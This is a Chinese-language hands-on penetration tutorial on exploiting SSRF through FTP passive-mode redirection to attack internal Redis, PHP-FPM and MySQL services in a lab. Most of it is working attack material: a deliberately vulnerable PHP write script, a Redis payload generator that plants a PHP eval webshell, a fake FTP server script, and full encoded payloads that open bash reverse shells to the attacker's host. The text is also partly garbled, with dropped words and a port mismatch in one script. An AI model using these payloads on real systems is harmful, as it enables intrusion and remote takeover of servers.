ftp550 实战 | 利用SSRF渗透内网主机-

FTP协议

FTP（File ，文件传输协议） 是 TCP/IP 协议组中的协议之一。FTP 协议包括两个组成部分，其一为 FTP 服务器，其二为 FTP 客户端。其中 FTP 服务器用来存储文件，用户可以使用 FTP 客户端通过 FTP 协议访问位于 FTP 服务器上的资源。在开发网站的时候，通常利用 FTP 协议把网页或程序传到 Web 服务器上。此外，由于 FTP 传输效率非常高，在网络上传输大的文件时，一般也采用该协议。

默认情况下 FTP 协议使用 TCP 端口中的 20 和 21 这两个端口，其中 20 用于传输数据，21 用于传输控制信息。但是，是否使用 20 作为传输数据的端口与 FTP 使用的传输模式有关，如果采用主动模式，那么数据传输端口就是 20；如果采用被动模式，则具体最终使用哪个端口要服务器端和客户端协商决定。

主动模式与被动模式

FTP会话包含了两个通道，控制通道和数据传输通道，FTP的工作有两种模式，一种是主动模式，一种是被动模式，以FTP 为参照：主动模式，服务器主动连接客户端传输；被动模式，等待客户端的连接。

主动模式（Port）

FTP客户端连接到FTP服务器的21号端口，发送用户名和密码，客户端随机开放一个高位端口（1024以上），发送PORT命令到FTP服务器，告知服务器客户端采用主动模式并开放端口，FTP服务器收到PORT主动模式命令和端口后，通过服务器的20号端口和客户端开放的端口连接，发送数据，原理如图所示。

.被动模式（）

FTP客户端连接到FTP服务器所监听的21端口，发送用户名和密码，发送PASV命令到FTP服务器，服务器载本地随机开放一个端口（1024以上），然后把开放的端口告知客户端，而后客户端再连接到服务器开放的端口进行数据传输，原理如图所示。（注：PASV是的缩写，被动模式）

. (2)

这里的主动和被动是相对与FTP 端而判断的。

无论是主动还是被动模式，首先的控制通道都是先建立起来，只是在数据传输模式上的区别。

注：绝大部分互联网应用都是被动模式

因为大部分客户端都是在路由器后面，没有独立的公网IP地址，服务器想要主动连接客户端，难度太大，在现在真实的互联网环境里面几乎是不可能完成的任务。

可见，在被动方式中，FTP 客户端和服务端的数据传输端口是由服务端指定的，而且还有一点是很多地方没有提到的，实际上除了端口，服务器的地址也是可以被指定的。由于 FTP 和 HTTP 类似，协议内容全是纯文本，所以我们可以很清晰的看到它是如何指定地址和端口的：

227 Entering Passive Mode(192,168,9,2,4,8)

227 和 Mode 类似 HTTP 的状态码和状态短语，而(192,168,9,2,4,8)代表让客户端到连接 192.168.9.2 的 4 * 256 + 8 = 1032 端口。

这样，假如我们指定(127,0,0,1,0,9000)，那么便可以将地址和端口指到 127.0.0.1:9000ftp550，也就是本地的 9000 端口。同时由于 FTP 的特性，其会把传输的数据原封不动的发给本地的 9000 端口，不会有任何的多余内容。如果我们将传输的数据换为特定的 数据，那我们便可以攻击内网特定端口上的应用了。在这整个过程中，FTP 只起到了一个重定向 的内容。

实验环境

攻击机：Kali —— 192.168.123.241

受害者： —— 192.168.123.189（运行服务“Redis、MySQL、PHP-FPM）

下面是一个含有漏洞的PHP脚本

<?php
    file_put_contents($_GET['file'], $_GET['data']);
?>

() 函数把一个字符串写入文件中。与依次调用 fopen()，() 以及 () 功能一样。

函数使用前需要将php.ini的设置为ON。

这个点是存在写入漏洞的，但是在不能写文件的环境下该如何利用呢？那么可以利用SSRF进行攻击。

但和不支持和dict协议。

那么我们如何才能实现 RCE 呢？那么这个时候我们便可以从 FTP 的被动模式入手，通过 SSRF 攻击内网应用。

SSRF利用FTP协议攻击Redis

假设内网中存在 Redis 并且可以未授权访问的话，我们也可以直接攻击 Redis，实现写入 、SSH 秘钥、计划任务等。

首先编写脚本生成攻击 Redis 的 （也可以使用）生成：

#!/usr/bin/env python
# coding: utf-8
import urllib
protocol="gopher://"
ip="127.0.0.1"
port="6379"
shell="nnnn"    # 一句话木马
filename="shell.php"
path="/var/www/html"
passwd=""    # 此处也可以填入Redis的密码, 在不存在Redis未授权的情况下适用
cmd=["flushall",
     "set 1 {}".format(shell.replace(" ","${IFS}")),
     "config set dir {}".format(path),
     "config set dbfilename {}".format(filename),
     "save"
     ]
if passwd:
    cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
    CRLF="rn"
    redis_arr = arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
    cmd+=CRLF
    return cmd

if __name__=="__main__":
    for x in cmd:
        payload += urllib.quote(redis_format(x))
    print payload

得到只选取_的部分

%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2435%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5B%22whoami%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

然后还是在攻击机上运行 .py 启动一个伪 FTP 服务：

# -*- coding: utf-8 -*-
# evil_ftp.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind(('0.0.0.0', 23))        # ftp服务绑定23号端口
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcomen')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.n')
#Size /
conn.send(b'550 Could not get the file size.n')
#EPSV (1)
conn.send(b'150 okn')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,6379)n') #STOR / (2) 
# "127,0,0,1"Redis服务为受害者本地，"6379"为为Redis服务的端口号
conn.send(b'150 Permission denied.n')
#QUIT
conn.send(b'221 Goodbye.n')
conn.close()

运行服务：

image-

最后直接构造请求发送 （无需进行二次URL编码）：

http://hacktop.com/ssrf_2.php?file=ftp://192.168.123.241:23/123&data=%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2435%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5B%22whoami%22%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

如下图所示，成功写入 ：

image-利用FTP协议攻击PHP-FPM

假设此时发现内网中存在 PHP-FPM，那我们可以通过 FTP 的被动模式攻击内网的 PHP-FPM。

首先使用生成 ：

image-

得到的 只要_后面的部分：

%0D%0FSERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0FSERVER_PROTOCOLHTTP/1.1%0ECONTENT_LENGTH107%0EREQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%1FSCRIPT_FILENAME/usr/share/nginx/html/index.php%0DDOCUMENT_ROOT/k%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.123.241/2333%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E

然后还是在攻击机上运行 .py 启动一个伪 FTP 服务：

# -*- coding: utf-8 -*-
# evil_ftp.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind(('0.0.0.0', 23))        # ftp服务绑定23号端口
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcomen')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.n')
#Size /
conn.send(b'550 Could not get the file size.n')
#EPSV (1)
conn.send(b'150 okn')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)n') #STOR / (2) 
# "127,0,0,1"PHP-FPM服务为受害者本地，"9000"为为PHP-FPM服务的端口号
conn.send(b'150 Permission denied.n')
#QUIT
conn.send(b'221 Goodbye.n')
conn.close()

运行服务：

image-

开启 nc 监听，等待反弹shell：

image-

最后构造请求发送 就行了：

http://hacktop.com/ssrf_2.php?file=ftp://192.168.123.241:23/123&data=%0D%0FSERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0FSERVER_PROTOCOLHTTP/1.1%0ECONTENT_LENGTH107%0EREQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%1FSCRIPT_FILENAME/usr/share/nginx/html/index.php%0DDOCUMENT_ROOT/k%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/192.168.123.241/2333%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E

image-

如上图所示，成功反弹 Shell。

SSRF利用FTP协议攻击MySQL

有关如何利用MySQL未授权抓取数据包在上一节已经详细讲解过了，这里就不再讲解。

这里就直接使用上一节已经写入的动态链接库和用户定义函数直接执行系统命令。

首先使用生成：

image-

得到的 只要_后面的部分：

%a4%85%a6%ff%21%61%64%6d%69%6e%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%66%5f%6f%73%4c%69%6e%75%78%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%6c%69%62%6d%79%73%71%6c%5f%70%69%64%32%37%32%35%35%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%78%38%36%5f%36%34%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%6d%79%73%71%6c%67%73%65%6c%65%63%74%20%73%79%73%5f%65%76%61%6c%28%27%65%63%68%6f%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4f%54%49%75%4d%54%59%34%4c%6a%45%79%4d%79%34%79%4e%44%45%76%4e%44%51%30%4e%43%41%77%50%69%59%78%7c%62%61%73%65%36%34%20%2d%64%7c%62%61%73%68%20%2d%69%27%29

然后还是在攻击机上运行 .py 启动一个伪 FTP 服务：

# -*- coding: utf-8 -*-
# evil_ftp.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind(('0.0.0.0', 23))        # ftp服务绑定23号端口
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcomen')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.n')
#Size /
conn.send(b'550 Could not get the file size.n')
#EPSV (1)
conn.send(b'150 okn')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)n') #STOR / (2) 
# "127,0,0,1"MySQL服务为受害者本地，"3306"为为MySQL服务的端口号
conn.send(b'150 Permission denied.n')
#QUIT
conn.send(b'221 Goodbye.n')
conn.close()

运行服务：

image-

开启 nc 监听，等待反弹shell：

image-

最后构造请求发送 就行了：

http://hacktop.com/ssrf_2.php?file=ftp://192.168.123.241:23/123&data=%a4%85%a6%ff%21%61%64%6d%69%6e%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%66%5f%6f%73%4c%69%6e%75%78%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%6c%69%62%6d%79%73%71%6c%5f%70%69%64%32%37%32%35%35%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%78%38%36%5f%36%34%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%6d%79%73%71%6c%67%73%65%6c%65%63%74%20%73%79%73%5f%65%76%61%6c%28%27%65%63%68%6f%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4f%54%49%75%4d%54%59%34%4c%6a%45%79%4d%79%34%79%4e%44%45%76%4e%44%51%30%4e%43%41%77%50%69%59%78%7c%62%61%73%65%36%34%20%2d%64%7c%62%61%73%68%20%2d%69%27%29

会员全站资源免费获取，点击查看会员权益